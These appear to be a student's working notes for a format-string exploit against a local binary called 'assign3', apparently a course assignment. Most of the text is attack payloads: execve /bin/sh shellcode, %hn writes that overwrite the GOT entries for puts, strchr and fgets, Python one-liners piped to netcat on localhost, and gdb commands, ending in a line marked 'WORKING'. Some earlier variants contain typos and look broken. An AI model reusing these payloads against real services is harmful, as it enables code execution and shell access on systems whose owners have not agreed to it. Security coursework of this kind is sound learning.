8As:
AAAAAAAA

8 pointers:
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p 

8NOPs:
\x90\x90\x90\x90\x90\x90\x90\x90

SHELLCODE:
"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"

0000000000601018 R_X86_64_JUMP_SLOT  strncmp@GLIBC_2.2.5
0000000000601020 R_X86_64_JUMP_SLOT  puts@GLIBC_2.2.5
**0000000000601030 R_X86_64_JUMP_SLOT  strchr@GLIBC_2.2.5
**0000000000601038 R_X86_64_JUMP_SLOT  printf@GLIBC_2.2.5
0000000000601040 R_X86_64_JUMP_SLOT  snprintf@GLIBC_2.2.5
**0000000000601048 R_X86_64_JUMP_SLOT  fgets@GLIBC_2.2.5
0000000000601050 R_X86_64_JUMP_SLOT  setvbuf@GLIBC_2.2.5

;48 bytes = +6$ -> buffer starts at 8$ == 14$

(python -c 'print "PING %32755c%16$hn%32768c%15$hn%60320c%14$hnAAAA\x20\x10\x60\x00\x00\x00\x00\x00\x22\x10\x60\x00\x00\x00\x00\x00\x24\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a".ljust(0x80, "\x00")' && cat) | ./assign3

strchr overwrite:
PING %32767c%14$hn%25015%15$hn%7663%16$hnAAAAAAA\x34\x10\x60\x00\x00\x00\x00\x00\x30\x10\x60\x00\x00\x00\x00\x00\x32\x10\x60\x00\x00\x00\x00\x00\0x90\0x90\0x90\0x90\0x90\0x90\0x90\0x90\0x90\0x90\0x90\0x90\0x90\x0a



fgets overwrite:
PING %32767c%14$hn%25057%15$hn%7711%16$hnAAAAAAA\x52\x10\x60\x00\x00\x00\x00\x00\x48\x10\x60\x00\x00\x00\x00\x00\x50\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90

NEW_fgets overwrite:

200 OK PONG %32767c%14$hn%25057%15$hn%7711%16$hn\x52\x10\x60\x00\x00\x00\x00\x00\x48\x10\x60\x00\x00\x00\x00\x00\x50\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90


200 OK PONG ----AAAAAAA
PING %32767c%12$hn%23857%13$hn%8911%14$hnAAAAAAA\x52\x10\x60\x00\x00\x00\x00\x00\x48\x10\x60\x00\x00\x00\x00\x00\x50\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\0a

601048
60104a
60104c

200 OK PONG 

PING %32767c%14$hn%23545%15$hn%9223%16$hnAAAAAAA\x34\x10\x60\x00\x00\x00\x00\x00\x30\x10\x60\x00\x00\x00\x00\x00\x32\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\0a


strchr overwrite:
PING %32767c%14$hn%25105c%15$hn%7663c%16$hnAAAAA\x34\x10\x60\x00\x00\x00\x00\x00\x30\x10\x60\x00\x00\x00\x00\x00\x32\x10\x60\x00\x00\x00\x00\x00\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a


OK PONG 200 %32755c%15$hn%27557c%16$hn%5223c%17$hnAAAAAA

\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90



puts (14/15/16)
python -c 'print "PING "+"%32755c%16$hn%27557c%17$hn%5223c%18$hnAAAAA\x24\x10\x60\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00\x22\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a".ljust(0x80, "\x00")' | nc localhost 4444

python -c 'print "PING "+"%29620c%14$hn%3147c%15$hn%12272c%16$hnAAAAA\x22\x10\x60\x00\x00\x00\x00\x00\x24\x10\x60\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a".ljust(0x80, "\x00")' | nc localhost 4444

python -c 'print "PING "+"%32755c%14$hn%27557c%15$hn%5223c%16$hnAAAAAAA\x24\x10\x60\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00\x22\x10\x60\x00\x00\x00\x00\x00"' | nc localhost 4444


PING %32767c%11$hnAAAAAA\x24\x10\x60\x00\x00\x00\x00\x00

PING %32755c%15$hn%27557c%16$hn%5223c%17$hnAAAA

200 OK PONG %32755c%15$hn%27557c%16$hn%5223c%17$hnAAAAAA

set follow-fork-mode child
b main
c
b*0x00000000004007e8
b*0x00000000004008b6
c


python -c 'print "PING "+"%29620c%14$hn%3147c%15$hn%12272c%16$hnAAAAA\x22\x10\x60\x00\x00\x00\x00\x00\x24\x10\x60\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a".ljust(0x80, "\x00")' | nc localhost 4444


p

PING %32755c%16$hn%32768c%15$hn%60313c%14$hnAAAA

PING %32767c%12$hn%27545%13$hnAA\x24\x10\x60\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00







puts:
PING %32767c%15$hn%25129c%16$hn%7639c%17$hnAAAAA\x24\x10\x60\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00\x22\x10\x60\x00\x00\x00\x00\x00\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a




puts w/ NOPS
python -c 'print "PING "+"%32767c%14$hn%25129c%15$hn%7639c%16$hnAAAAA\x24\x10\x60\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00\x22\x10\x60\x00\x00\x00\x00\x00"+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".ljust(0x80, "\x00")' > input





python -c 'print "PING " + "%32755c%16$hn%32768c%15$hn%60320c%14$hnAAAA\x20\x10\x60\x00\x00\x00\x00\x00\x22\x10\x60\x00\x00\x00\x00\x00\x24\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a".ljust(0x80, "\x00") | nc localhost 4444


WORKING:
python -c 'print "PING " + "%32755c%14$hn%32768c%15$hn%60320c%16$hnAAAA\x4c\x10\x60\x00\x00\x00\x00\x00\x4a\x10\x60\x00\x00\x00\x00\x00\x48\x10\x60\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\x31\xc0\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x0a".ljust(0x80, "\x00")' | nc localhost 4444





